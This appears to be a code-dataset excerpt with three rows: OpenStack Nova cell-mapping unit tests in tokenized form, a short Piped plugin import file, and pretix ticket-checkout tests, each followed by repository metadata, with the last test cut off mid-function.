name|'uuid'
op|'='
name|'cell_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'.'
name|'append'
op|'('
name|'uuid'
op|')'
newline|'\n'
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|'='
name|'ctxt'
op|'.'
name|'project_id'
op|','
nl|'\n'
name|'uuid'
op|'='
name|'uuid'
op|')'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_instances'
op|'('
name|'cell_uuid'
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'uuid'
name|'in'
name|'instance_uuids'
op|':'
newline|'\n'
indent|' '
name|'inst_mapping'
op|'='
name|'objects'
op|'.'
name|'InstanceMapping'
op|'.'
name|'get_by_instance_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ctxt'
op|'.'
name|'project_id'
op|','
name|'inst_mapping'
op|'.'
name|'project_id'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_mapping'
op|'.'
name|'uuid'
op|','
name|'inst_mapping'
op|'.'
name|'cell_mapping'
op|'.'
name|'uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_instances_duplicates
dedent|''
dedent|''
name|'def'
name|'test_map_instances_duplicates'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
string|"'fake-user'"
op|','
string|"'fake_project'"
op|')'
newline|'\n'
name|'cell_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'.'
name|'append'
op|'('
name|'uuid'
op|')'
newline|'\n'
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|'='
name|'ctxt'
op|'.'
name|'project_id'
op|','
nl|'\n'
name|'uuid'
op|'='
name|'uuid'
op|')'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'objects'
op|'.'
name|'InstanceMapping'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|'='
name|'ctxt'
op|'.'
name|'project_id'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'instance_uuids'
op|'['
number|'0'
op|']'
op|','
nl|'\n'
name|'cell_mapping'
op|'='
name|'cell_mapping'
op|')'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_instances'
op|'('
name|'cell_uuid'
op|','
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'%s already mapped to cell'"
op|'%'
name|'instance_uuids'
op|'['
number|'0'
op|']'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'uuid'
name|'in'
name|'instance_uuids'
op|':'
newline|'\n'
indent|' '
name|'inst_mapping'
op|'='
name|'objects'
op|'.'
name|'InstanceMapping'
op|'.'
name|'get_by_instance_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ctxt'
op|'.'
name|'project_id'
op|','
name|'inst_mapping'
op|'.'
name|'project_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell0
dedent|''
dedent|''
name|'def'
name|'test_map_cell0'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'database_connection'
op|'='
string|"'fake:/foobar//'"
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell0'
op|'('
name|'database_connection'
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'CELL0_UUID'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'cell0'"
op|','
name|'cell_mapping'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'none:///'"
op|','
name|'cell_mapping'
op|'.'
name|'transport_url'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'database_connection'
op|','
name|'cell_mapping'
op|'.'
name|'database_connection'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell0_default_database
dedent|''
name|'def'
name|'test_map_cell0_default_database'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'CONF'
op|'.'
name|'set_default'
op|'('
string|"'connection'"
op|','
nl|'\n'
string|"'fake://netloc/nova_api'"
op|','
nl|'\n'
name|'group'
op|'='
string|"'api_database'"
op|')'
newline|'\n'
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell0'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'CELL0_UUID'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'cell0'"
op|','
name|'cell_mapping'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'none:///'"
op|','
name|'cell_mapping'
op|'.'
name|'transport_url'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake://netloc/nova_api_cell0'"
op|','
nl|'\n'
name|'cell_mapping'
op|'.'
name|'database_connection'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.453739 | 265 | 0.597873 | 12,540 | 84,262 | 3.913078 | 0.039394 | 0.158345 | 0.091094 | 0.075036 | 0.905747 | 0.868616 | 0.837151 | 0.806929 | 0.770817 | 0.732892 | 0 | 0.012838 | 0.099618 | 84,262 | 6,765 | 266 | 12.45558 | 0.633943 | 0 | 0 | 0.952846 | 0 | 0.000591 | 0.362631 | 0.049204 | 0 | 0 | 0 | 0 | 0.018773 | 0 | null | null | 0.001478 | 0.002809 | null | null | 0.000296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c9e8a7d520f1520794289f6836b25245ebc144a5 | 149 | py | Python | contrib/status_testing/piped/plugins/status_testing_processors.py | alexbrasetvik/Piped | 0312c14d6c4c293df378c915cc9787bcc7faed36 | ["MIT"] | 3 | 2015-02-12T20:34:30.000Z | 2016-08-06T06:54:48.000Z | contrib/status_testing/piped/plugins/status_testing_processors.py | alexbrasetvik/Piped | 0312c14d6c4c293df378c915cc9787bcc7faed36 | ["MIT"] | null | null | null | contrib/status_testing/piped/plugins/status_testing_processors.py | alexbrasetvik/Piped | 0312c14d6c4c293df378c915cc9787bcc7faed36 | ["MIT"] | 2 | 2015-12-16T14:18:14.000Z | 2019-04-12T01:43:10.000Z | from piped_status_testing import version
from piped_status_testing.processors import ReporterCreator, StatusTestProcessor, WaitForReporterProcessing | 49.666667 | 107 | 0.912752 | 15 | 149 | 8.8 | 0.666667 | 0.136364 | 0.227273 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067114 | 149 | 3 | 107 | 49.666667 | 0.94964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c9fface5158ccaae961297b71b7e9fa9fc4203e0 | 55482 | py | Python | src/tests/presale/test_checkout.py | td00/pretix | e31bd7600c85598de135f2eb5012e2f33fdb1d11 | ["ECL-2.0", "Apache-2.0"] | null | null | null | src/tests/presale/test_checkout.py | td00/pretix | e31bd7600c85598de135f2eb5012e2f33fdb1d11 | ["ECL-2.0", "Apache-2.0"] | null | null | null | src/tests/presale/test_checkout.py | td00/pretix | e31bd7600c85598de135f2eb5012e2f33fdb1d11 | ["ECL-2.0", "Apache-2.0"] | 1 | 2017-08-09T17:11:28.000Z | 2017-08-09T17:11:28.000Z | import datetime
import os
from datetime import timedelta
from decimal import Decimal
from bs4 import BeautifulSoup
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.utils.timezone import now
from pretix.base.models import (
CartPosition, Event, Item, ItemCategory, Order, OrderPosition, Organizer,
Question, Quota, Voucher,
)
from pretix.base.models.items import ItemAddOn, ItemVariation, SubEventItem
class CheckoutTestCase(TestCase):
def setUp(self):
super().setUp()
self.orga = Organizer.objects.create(name='CCC', slug='ccc')
self.event = Event.objects.create(
organizer=self.orga, name='30C3', slug='30c3',
date_from=datetime.datetime(2013, 12, 26, tzinfo=datetime.timezone.utc),
plugins='pretix.plugins.stripe,pretix.plugins.banktransfer',
live=True
)
self.category = ItemCategory.objects.create(event=self.event, name="Everything", position=0)
self.quota_tickets = Quota.objects.create(event=self.event, name='Tickets', size=5)
self.ticket = Item.objects.create(event=self.event, name='Early-bird ticket',
category=self.category, default_price=23, admission=True)
self.quota_tickets.items.add(self.ticket)
self.event.settings.set('attendee_names_asked', False)
self.event.settings.set('payment_banktransfer__enabled', True)
self.client.get('/%s/%s/' % (self.orga.slug, self.event.slug))
self.session_key = self.client.cookies.get(settings.SESSION_COOKIE_NAME).value
self._set_session('email', 'admin@localhost')
self.workshopcat = ItemCategory.objects.create(name="Workshops", is_addon=True, event=self.event)
self.workshopquota = Quota.objects.create(event=self.event, name='Workshop 1', size=5)
self.workshop1 = Item.objects.create(event=self.event, name='Workshop 1',
category=self.workshopcat, default_price=12)
self.workshop2 = Item.objects.create(event=self.event, name='Workshop 2',
category=self.workshopcat, default_price=12)
self.workshop2a = ItemVariation.objects.create(item=self.workshop2, value='A')
self.workshop2b = ItemVariation.objects.create(item=self.workshop2, value='B')
self.workshopquota.items.add(self.workshop1)
self.workshopquota.items.add(self.workshop2)
self.workshopquota.variations.add(self.workshop2a)
self.workshopquota.variations.add(self.workshop2b)
def test_empty_cart(self):
response = self.client.get('/%s/%s/checkout/start' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/' % (self.orga.slug, self.event.slug),
target_status_code=200)
def test_questions(self):
q1 = Question.objects.create(
event=self.event, question='Age', type=Question.TYPE_NUMBER,
required=True
)
q2 = Question.objects.create(
event=self.event, question='How have you heard from us?', type=Question.TYPE_STRING,
required=False
)
self.ticket.questions.add(q1)
self.ticket.questions.add(q2)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
cr2 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=20, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr1.id, q1.id))), 1)
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr2.id, q1.id))), 1)
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr1.id, q2.id))), 1)
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr2.id, q2.id))), 1)
# Not all required fields filled out, expect failure
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-question_%s' % (cr1.id, q1.id): '42',
'%s-question_%s' % (cr2.id, q1.id): '',
'%s-question_%s' % (cr1.id, q2.id): 'Internet',
'%s-question_%s' % (cr2.id, q2.id): '',
'email': 'admin@localhost'
}, follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select('.has-error')), 1)
# Corrected request
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-question_%s' % (cr1.id, q1.id): '42',
'%s-question_%s' % (cr2.id, q1.id): '23',
'%s-question_%s' % (cr1.id, q2.id): 'Internet',
'%s-question_%s' % (cr2.id, q2.id): '',
'email': 'admin@localhost'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1 = CartPosition.objects.get(id=cr1.id)
cr2 = CartPosition.objects.get(id=cr2.id)
self.assertEqual(cr1.answers.filter(question=q1).count(), 1)
self.assertEqual(cr2.answers.filter(question=q1).count(), 1)
self.assertEqual(cr1.answers.filter(question=q2).count(), 1)
self.assertFalse(cr2.answers.filter(question=q2).exists())
def test_question_file_upload(self):
q1 = Question.objects.create(
event=self.event, question='Student ID', type=Question.TYPE_FILE,
required=False
)
self.ticket.questions.add(q1)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr1.id, q1.id))), 1)

        f = SimpleUploadedFile("testfile.txt", b"file_content")
        response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-question_%s' % (cr1.id, q1.id): f,
            'email': 'admin@localhost'
        }, follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)
        cr1 = CartPosition.objects.get(id=cr1.id)
        a = cr1.answers.get(question=q1)
        assert a.file
        assert a.file.read() == b"file_content"
        assert os.path.exists(os.path.join(settings.MEDIA_ROOT, a.file.name))

        # Delete the uploaded file again
        self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-question_%s-clear' % (cr1.id, q1.id): 'on',
            'email': 'admin@localhost'
        }, follow=True)
        assert not cr1.answers.exists()
        assert not os.path.exists(os.path.join(settings.MEDIA_ROOT, a.file.name))

    def test_attendee_email_required(self):
        self.event.settings.set('attendee_emails_asked', True)
        self.event.settings.set('attendee_emails_required', True)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select('input[name=%s-attendee_email]' % cr1.id)), 1)

        # Not all required fields filled out, expect failure
        response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-attendee_email' % cr1.id: '',
            'email': 'admin@localhost'
        }, follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select('.has-error')), 1)

        # Corrected request
        response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-attendee_email' % cr1.id: 'foo@localhost',
            'email': 'admin@localhost'
        }, follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertEqual(cr1.attendee_email, 'foo@localhost')

    def test_attendee_name_required(self):
        self.event.settings.set('attendee_names_asked', True)
        self.event.settings.set('attendee_names_required', True)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select('input[name=%s-attendee_name]' % cr1.id)), 1)

        # Not all required fields filled out, expect failure
        response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-attendee_name' % cr1.id: '',
            'email': 'admin@localhost'
        }, follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select('.has-error')), 1)

        # Corrected request
        response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-attendee_name' % cr1.id: 'Peter',
            'email': 'admin@localhost'
        }, follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertEqual(cr1.attendee_name, 'Peter')

    def test_attendee_name_optional(self):
        self.event.settings.set('attendee_names_asked', True)
        self.event.settings.set('attendee_names_required', False)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select('input[name=%s-attendee_name]' % cr1.id)), 1)

        # Not all fields filled out, expect success
        response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
            '%s-attendee_name' % cr1.id: '',
            'email': 'admin@localhost'
        }, follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertIsNone(cr1.attendee_name)

    def test_payment(self):
        # TODO: Test for correct payment method fees
        self.event.settings.set('payment_stripe__enabled', True)
        self.event.settings.set('payment_banktransfer__enabled', True)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select('input[name=payment]')), 2)
        response = self.client.post('/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug), {
            'payment': 'banktransfer'
        }, follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

    def test_premature_confirm(self):
        response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        self.assertRedirects(response, '/%s/%s/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

        self.event.settings.set('payment_stripe__enabled', True)
        self.event.settings.set('payment_banktransfer__enabled', True)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

        self._set_session('payment', 'banktransfer')
        self.event.settings.set('attendee_names_asked', True)
        self.event.settings.set('attendee_names_required', True)
        response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

        cr1.attendee_name = 'Peter'
        cr1.save()
        q1 = Question.objects.create(
            event=self.event, question='Age', type=Question.TYPE_NUMBER,
            required=True
        )
        self.ticket.questions.add(q1)
        response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

        q1.required = False
        q1.save()
        response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        self.assertEqual(response.status_code, 200)

        self._set_session('email', 'invalid')
        response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

    def _set_session(self, key, value):
        session = self.client.session
        session[key] = value
        session.save()
    def test_subevent(self):
        self.event.has_subevents = True
        self.event.save()
        se = self.event.subevents.create(name='Foo', date_from=now())
        q = se.quotas.create(name="foo", size=None, event=self.event)
        q.items.add(self.ticket)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10), subevent=se
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.first().subevent, se)

    def test_free_price(self):
        self.ticket.free_price = True
        self.ticket.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=42, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.first().price, 42)

    def test_confirm_in_time(self):
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_subevent_confirm_expired_available(self):
        self.event.has_subevents = True
        self.event.save()
        se = self.event.subevents.create(name='Foo', date_from=now())
        se2 = self.event.subevents.create(name='Foo', date_from=now())
        self.quota_tickets.size = 0
        self.quota_tickets.subevent = se2
        self.quota_tickets.save()
        q2 = se.quotas.create(event=self.event, size=1, name='Bar')
        q2.items.add(self.ticket)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10), subevent=se
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_confirm_expired_available(self):
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_subevent_confirm_price_changed(self):
        self.event.has_subevents = True
        self.event.save()
        se = self.event.subevents.create(name='Foo', date_from=now())
        q = se.quotas.create(name="foo", size=None, event=self.event)
        q.items.add(self.ticket)
        SubEventItem.objects.create(subevent=se, item=self.ticket, price=24)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10), subevent=se
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertEqual(cr1.price, 24)

    def test_addon_price_included(self):
        ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1,
                                 price_included=True)
        cp1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.workshop1,
            price=0, expires=now() - timedelta(minutes=10),
            addon_to=cp1
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertEqual(OrderPosition.objects.filter(item=self.workshop1).last().price, 0)

    def test_confirm_price_changed(self):
        self.ticket.default_price = 24
        self.ticket.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertEqual(cr1.price, 24)

    def test_confirm_free_price_increased(self):
        self.ticket.default_price = 24
        self.ticket.free_price = True
        self.ticket.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertEqual(cr1.price, 24)

    def test_voucher(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2))
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() + timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.first().voucher, v)
        self.assertEqual(Voucher.objects.get(pk=v.pk).redeemed, 1)

    def test_voucher_required(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2))
        self.ticket.require_voucher = True
        self.ticket.save()
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
